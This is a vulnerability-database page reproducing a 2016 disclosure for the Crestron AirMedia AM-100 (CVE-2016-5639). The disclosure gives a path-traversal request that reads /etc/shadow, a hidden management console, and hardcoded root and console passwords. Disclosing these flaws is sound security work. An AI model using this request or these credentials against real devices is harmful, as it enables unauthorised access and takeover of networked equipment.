Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2016-5639

Publish Date: 23 Nov 2016

Source

                							

                =================================================================
# Crestron AM-100 (Multiple Vulnerabilities)
=================================================================
# Date: 2016-08-01
# Exploit Author: Zach Lanier
# Vendor Homepage: https://www.crestron.com/products/model/am-100
# Version: v1.1.1.11 - v1.2.1
# CVE: CVE-2016-5639 
# References: 
#   https://medium.com/@benichmt1/an-unwanted-wireless-guest-9433383b1673#.78tu9divi
#   https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-001.md
 
Description:
The Crestron AirMedia AM-100 with firmware versions v1.1.1.11 - v1.2.1 is vulnerable to multiple issues.
 
1) Path Traversal
 
GET request: 
http://[AM-100-ADDRESS]/cgi-bin/login.cgi?lang=en&amp;src=../../../../../../../../../../../../../../../../../../../../etc/shadow
 
2) Hidden Management Console
 
http://[AM-100-ADDRESS]/cgi-bin/login_rdtool.cgi
The AM-100 has a hardcoded default credential of rdtool::mistral5885
This interface contains the ability to upload arbitrary files (RD upload) and can enable a telnet server that runs on port 5885 (RD Debug mode).
 
3) Hardcoded credentials
 
The default root password for these devices is root::awind5885
Valid login sessions for the default (non-debugging) management interface are stored on the filesystem as session01, session02.. etc. Cleartext credentials can be read directly from these files.



<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Crestron AM-100 1.2.1 Path Traversal / Hard-Coded Credentials

Vulmon Search

About

Products

Connect